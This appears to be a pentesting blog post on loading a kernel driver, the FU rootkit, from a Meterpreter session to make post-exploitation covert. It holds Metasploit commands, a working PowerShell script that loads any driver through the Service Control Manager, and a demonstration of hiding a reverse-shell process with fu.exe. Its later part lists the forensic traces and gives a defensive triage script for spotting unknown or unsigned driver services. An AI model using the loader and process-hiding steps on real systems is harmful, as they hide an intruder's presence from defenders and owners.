Friday, January 3, 2014

Loading a kernel driver from Meterpreter

Since code running in kernel space is much harder to detect, you may want to load your own rootkit kernel driver to hide your shell, a process or a connection, and thus make your post-exploitation work more covert. Rootkits are not the only drivers that are useful to a pentester: for example, we can load the packet capture driver (npf.sys) from WinPcap if we intend to sniff or inject packets on the network to carry out further attacks.

A good and comfortable way to load drivers is through the Service Control Manager (SCM) API, which lets you register and start a kernel driver in a safe, supported way via functions such as OpenSCManagerA, CreateServiceA, OpenServiceA and StartServiceA. Taking advantage of the Services mixin I made a simple module to achieve this from Meterpreter. Let's see an example with the well-known FU rootkit driver.

[*] Backgrounding session 1...
msf exploit(handler) > use post/windows/manage/driver_loader 
msf post(driver_loader) > set driver_name FU_RK
driver_name => FU_RK
msf post(driver_loader) > set driver_path c:\\windows\\system32\\drivers\\fu.sys
driver_path => c:\windows\system32\drivers\fu.sys
msf post(driver_loader) > set session 1
session => 1
msf post(driver_loader) > show options

Module options (post/windows/manage/driver_loader):

   Name          Current Setting          Required  Description
   ----          ---------------          --------  -----------
   DRIVER_NAME   FU_RK                    yes       Driver Name.
   DRIVER_PATH   c:\windows\system32\drivers\fu.sys  yes       Driver path in %SYSTEMROOT%.Example: c:\windows\system32\msf.sys
   ERROR_TYPE    ignore                   yes       Error type. (accepted: ignore, normal, severe, critical)
   SERVICE_TYPE  kernel                   yes       Service type. (accepted: kernel, file_system, adapter, recognizer)
   SESSION       1                        yes       The session to run this module on.
   START_TYPE    auto                     yes       Start type. (accepted: boot, system, auto, demand, disabled)

msf post(driver_loader) > exploit

[*] Service object added to the Service Control Manager database.
[+] Driver loaded successfully.
[*] Post module execution completed
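The module above wraps the SCM calls in Ruby; the following PowerShell script is an added example (it is not code from the original post or from the Metasploit module) that performs the same sequence directly against advapi32 with P/Invoke, so you can see what the DRIVER_NAME, DRIVER_PATH, SERVICE_TYPE, START_TYPE and ERROR_TYPE options turn into at the API level. It assumes an elevated PowerShell session on the target; the default driver name and path are placeholders matching the demo.

```powershell
# Added example, not part of the original post or the Metasploit module.
# Registers a kernel driver as an SCM service and starts it (which loads the image).
# Assumptions: run elevated on Windows; defaults are placeholders from the demo above.
param(
    [string]$DriverName = 'FU_RK',
    [string]$DriverPath = 'c:\windows\system32\drivers\fu.sys',
    [ValidateSet('kernel','file_system','adapter','recognizer')][string]$ServiceType = 'kernel',
    [ValidateSet('boot','system','auto','demand','disabled')][string]$StartType = 'demand',
    [ValidateSet('ignore','normal','severe','critical')][string]$ErrorType = 'ignore'
)

$sig = @'
using System;
using System.Runtime.InteropServices;
public static class Scm {
    [DllImport("advapi32.dll", SetLastError = true, CharSet = CharSet.Unicode)]
    public static extern IntPtr OpenSCManager(string machine, string db, uint access);
    [DllImport("advapi32.dll", SetLastError = true, CharSet = CharSet.Unicode)]
    public static extern IntPtr CreateService(IntPtr hScm, string name, string display,
        uint access, uint svcType, uint startType, uint errCtl, string binPath,
        string group, IntPtr tagId, string deps, string user, string pass);
    [DllImport("advapi32.dll", SetLastError = true, CharSet = CharSet.Unicode)]
    public static extern IntPtr OpenService(IntPtr hScm, string name, uint access);
    [DllImport("advapi32.dll", SetLastError = true, CharSet = CharSet.Unicode)]
    public static extern bool StartService(IntPtr hSvc, uint argc, string[] argv);
    [DllImport("advapi32.dll", SetLastError = true)]
    public static extern bool CloseServiceHandle(IntPtr h);
}
'@
Add-Type -TypeDefinition $sig

# Win32 constants behind the module's SERVICE_TYPE / START_TYPE / ERROR_TYPE options
$svcTypes   = @{ kernel = 0x1; file_system = 0x2; adapter = 0x4; recognizer = 0x8 }
$startTypes = @{ boot = 0; system = 1; auto = 2; demand = 3; disabled = 4 }
$errTypes   = @{ ignore = 0; normal = 1; severe = 2; critical = 3 }
$SC_MANAGER_CREATE_SERVICE     = 0x0002
$SERVICE_ALL_ACCESS            = 0xF01FF
$ERROR_SERVICE_EXISTS          = 1073
$ERROR_SERVICE_ALREADY_RUNNING = 1056

function Invoke-Win32Failure([string]$what) {
    $code = [Runtime.InteropServices.Marshal]::GetLastWin32Error()
    throw "$what failed with Win32 error $code"
}

if (-not (Test-Path $DriverPath)) { throw "Driver image not found: $DriverPath" }

$hScm = [Scm]::OpenSCManager($null, $null, $SC_MANAGER_CREATE_SERVICE)
if ($hScm -eq [IntPtr]::Zero) { Invoke-Win32Failure 'OpenSCManager' }
try {
    $hSvc = [Scm]::CreateService($hScm, $DriverName, $DriverName, $SERVICE_ALL_ACCESS,
        $svcTypes[$ServiceType], $startTypes[$StartType], $errTypes[$ErrorType],
        $DriverPath, $null, [IntPtr]::Zero, $null, $null, $null)
    if ($hSvc -eq [IntPtr]::Zero) {
        # A service with that name already exists: open it instead of failing
        if ([Runtime.InteropServices.Marshal]::GetLastWin32Error() -ne $ERROR_SERVICE_EXISTS) {
            Invoke-Win32Failure 'CreateService'
        }
        $hSvc = [Scm]::OpenService($hScm, $DriverName, $SERVICE_ALL_ACCESS)
        if ($hSvc -eq [IntPtr]::Zero) { Invoke-Win32Failure 'OpenService' }
        Write-Host "[*] Service $DriverName already exists, reusing it."
    } else {
        Write-Host "[*] Service object added to the Service Control Manager database."
    }
    try {
        # StartService on a SERVICE_KERNEL_DRIVER entry is what actually maps the image
        # into the kernel. On 64-bit Vista and later this is where an unsigned driver is rejected.
        if (-not [Scm]::StartService($hSvc, 0, $null)) {
            if ([Runtime.InteropServices.Marshal]::GetLastWin32Error() -eq $ERROR_SERVICE_ALREADY_RUNNING) {
                Write-Host "[*] Driver was already loaded."
            } else { Invoke-Win32Failure 'StartService' }
        } else {
            Write-Host "[+] Driver loaded successfully."
        }
    } finally { [void][Scm]::CloseServiceHandle($hSvc) }
} finally { [void][Scm]::CloseServiceHandle($hScm) }
```

The script handles the two outcomes the module also has to deal with: ERROR_SERVICE_EXISTS when a previous run already registered the name (it reopens the existing entry rather than aborting), and ERROR_SERVICE_ALREADY_RUNNING when the driver is already resident. Everything else is treated as a hard failure with the raw Win32 error code, which is what you want to see when StartService refuses an image.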

We can verify that the driver was loaded successfully, for example with sc query FU_RK (which reports the service type as KERNEL_DRIVER and its state as RUNNING) or by listing loaded drivers with driverquery.

Now we can use fu.exe to hide some processes.

meterpreter > shell
Process 1972 created.
Channel 1 created.
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\Documents and Settings\Test\Desktop>cd %TEMP%
cd %TEMP%

C:\DOCUME~1\Test\LOCALS~1\Temp>tasklist | findstr "meterpreter_reverse"
tasklist | findstr "meterpreter_reverse"
meterpreter_reverse.exe     1628 Console                 0      7.360 K

C:\DOCUME~1\Test\LOCALS~1\Temp>fu -ph 1628
fu -ph 1628

C:\DOCUME~1\Test\LOCALS~1\Temp>tasklist | findstr "meterpreter_reverse"
tasklist | findstr "meterpreter_reverse"


Note that a drawback of using the SCM is that once the service has been installed it leaves artifacts in the registry under HKLM\SYSTEM\CurrentControlSet\Services\<DRIVER_NAME> (ImagePath, Type, Start and ErrorControl values), Windows records the installation in the System event log (Service Control Manager event ID 7045), and the driver file itself stays on disk; any of these may raise suspicion from a forensic point of view. Deleting the service afterwards removes the registry key but neither unloads the driver nor removes the file. Also keep in mind that 64-bit Windows Vista and later enforce kernel-mode code signing, so an unsigned driver such as fu.sys is rejected at StartService there; the demo above runs on 32-bit Windows XP, where no such check exists.
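From the defender's side, those registry artifacts are exactly what a triage script looks for. The following PowerShell is an added example (not code from the original post) that enumerates every kernel and file-system driver service under HKLM\SYSTEM\CurrentControlSet\Services, resolves the ImagePath forms Windows actually stores, and flags entries whose image is missing, not Authenticode-signed, or absent from an optional baseline list of service names taken from a known-good host. It assumes an administrative PowerShell session; the $Baseline parameter and the Resolve-DriverImagePath helper are this example's own names.

```powershell
# Added example, not part of the original post. Triage of SCM driver artifacts.
# Assumption: run as administrator; $Baseline is an optional list of service names
# captured (e.g. with the same script's Name column) from a clean reference host.
param([string[]]$Baseline = @())

$svcRoot    = 'HKLM:\SYSTEM\CurrentControlSet\Services'
$startNames = @('boot', 'system', 'auto', 'demand', 'disabled')   # Start value 0..4

function Resolve-DriverImagePath([string]$raw) {
    # Driver ImagePath values come in several shapes; normalise to a usable file path:
    #   \??\C:\path\foo.sys   \SystemRoot\system32\drivers\foo.sys   system32\DRIVERS\foo.sys
    if ([string]::IsNullOrEmpty($raw)) { return $null }
    $p = $raw.Trim('"')
    $p = $p -replace '^\\\?\?\\', ''
    $p = $p -replace '^\\SystemRoot\\', "$env:SystemRoot\"
    if ($p -match '^system32\\') { $p = "$env:SystemRoot\$p" }
    return $p
}

$results = foreach ($key in Get-ChildItem $svcRoot) {
    $props = Get-ItemProperty $key.PSPath
    # Type 1 = SERVICE_KERNEL_DRIVER, 2 = SERVICE_FILE_SYSTEM_DRIVER; skip user-mode services
    if ($props.Type -ne 1 -and $props.Type -ne 2) { continue }

    $image  = Resolve-DriverImagePath $props.ImagePath
    $exists = [bool]($image -and (Test-Path $image))
    $signed = $null
    if ($exists) { $signed = (Get-AuthenticodeSignature $image).Status -eq 'Valid' }

    $start = $props.Start
    if ($start -is [int] -and $start -ge 0 -and $start -lt 5) { $start = $startNames[$start] }

    [pscustomobject]@{
        Name       = $key.PSChildName
        Start      = $start
        ImagePath  = $image
        Exists     = $exists
        Signed     = $signed
        InBaseline = ($Baseline.Count -eq 0) -or ($Baseline -contains $key.PSChildName)
    }
}

# Report anything unsigned, missing on disk, or unknown to the baseline host.
$results |
    Where-Object { -not $_.Signed -or -not $_.Exists -or -not $_.InBaseline } |
    Sort-Object Name |
    Format-Table Name, Start, Exists, Signed, InBaseline, ImagePath -AutoSize
```

Two caveats when reading the output: many in-box drivers are signed through a catalog rather than an embedded signature, so Get-AuthenticodeSignature alone produces a long list of Signed=False entries on older systems (and on the XP box in the demo almost everything is unsigned). The baseline comparison is the stronger signal there: an FU_RK entry pointing at fu.sys shows up as not in the baseline regardless of signature status.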
